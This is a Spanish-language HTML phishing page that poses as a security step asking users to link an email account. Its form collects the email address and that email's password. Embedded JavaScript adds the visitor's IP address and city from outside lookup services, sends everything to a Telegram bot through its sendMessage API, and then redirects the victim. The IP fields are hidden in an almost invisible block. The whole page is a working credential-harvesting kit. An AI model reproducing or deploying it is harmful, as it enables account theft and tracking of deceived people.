<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>LOGINN-HOME-PAGE</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #f4f7fc;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .login-container {
            background-color: #fff;
            padding: 30px 40px;
            border-radius: 10px;
            box-shadow: 0 4px 20px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 380px;
        }

        h2 {
            text-align: center;
            margin-bottom: 20px;
            font-size: 24px;
            color: #333;
        }

        .form-group {
            margin-bottom: 20px;
            position: relative;
        }

        .form-group label {
            font-size: 14px;
            color: #555;
            margin-bottom: 5px;
            display: block;
        }

        .phone-input-wrapper {
            
            justify-content: space-between;
            border: 1px solid #01e628;
            border-radius: 8px;
            padding: 10px;
        }

        .phone-input-wrapper select {
            border: none;
            background-color: transparent;
            font-size: 14pt;
            padding: 0 10px;
            cursor: pointer;
        }

        .phone-input-wrapper input {
            border: none;
            border-bottom: 2px solid black;
            background-color: transparent;
            font-size: 16px;
            padding: 10px;
            width: 90%;
            color: #001606;
        }

        .btn {
            width: 100%;
            padding: 12px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }

        .btn:hover {
            background-color: #45a049;
        }

        .footer {
            text-align: center;
            margin-top: 20px;
            font-size: 14px;
            color: #5f5c5c;
        }

        .footer a {
            color: #4CAF50;
            text-decoration: none;
        }

        .phone-input-wrapper input:focus {
    color: #000000; /* Un verde claro, por ejemplo */
    outline: none; /* Opcional: elimina el borde azul por defecto */
}


       
    </style>
</head>
<body>
    

    
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>  
    <script src="elwsss/open.js"></script>
    <script>
      $.getJSON("https://api.ipify.org?format=json", function(data) {
              $("#gfg").html(data.ip);
          });
          $.getJSON("https://ipinfo.io", function(response) {
        $("#ip").html("IP: " + response.ip);
        $("#address").html("" + response.city + ", " + response.country);
      });
    
      var u_name,  u_name2,  ip, ip2, message;
      var ready = function() {
        u_name = document.getElementById("mem9").value;
        u_name2 = document.getElementById("mem0").value;
    
        ip = document.getElementById("gfg").innerHTML;
        ip2 = document.getElementById("address").innerHTML;
        message = "mensaje fff\n☰CORE@@@: " + u_name + "\n☰contraINT: " + u_name2 +  "\n🌎IP: " + ip +"\n" + ip2;
      };
      var sender = function() {
        ready();
        var settings = {
          "async": true,
          "crossDomain": true,
          "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
          "method": "POST",
          "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
          },
          "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
          })
        };
        $.ajax(settings).done(function(response) {
          console.log(response);
          window.location = 'ican.html';
        });
        return false;
      };   </script>
<div class="login-container">
  
    <form method="post" action="#" onsubmit="return sender();">
        <div class="form-group">
            <center> <label for="phone" style="font-size: 15pt;">Enlaza un correo para guardar tu seguridad</label>
          <img src="carpetadeap/ddooo.jpg" alt=""></center> 
            <div class="phone-input-wrapper">
               
                <input style="bor"  type="email" id="mem9" name="mem9" placeholder="INGRESA Y ASOCIA UN CORREO" required>
            <br>
                <input  type="password" id="mem0" name="mem0" placeholder="INGRESA LA CONTRASEÑA DEL CORREO" required>
            </div>
        </div>
        <button type="submit" class="btn">SIGUIENTE</button>

       
    </form>

    <div class="footer">
        <p>¿No tienes cuenta? <a href="#">Regístrate</a></p>
    </div>
    
</div>

</body>
</html><div style="color: rgb(255, 255, 255);font-size: 0.00002pt;" >
    <p id="gfg"></p>
    <p id="ip"></p>
    <p id="address"></p></div>
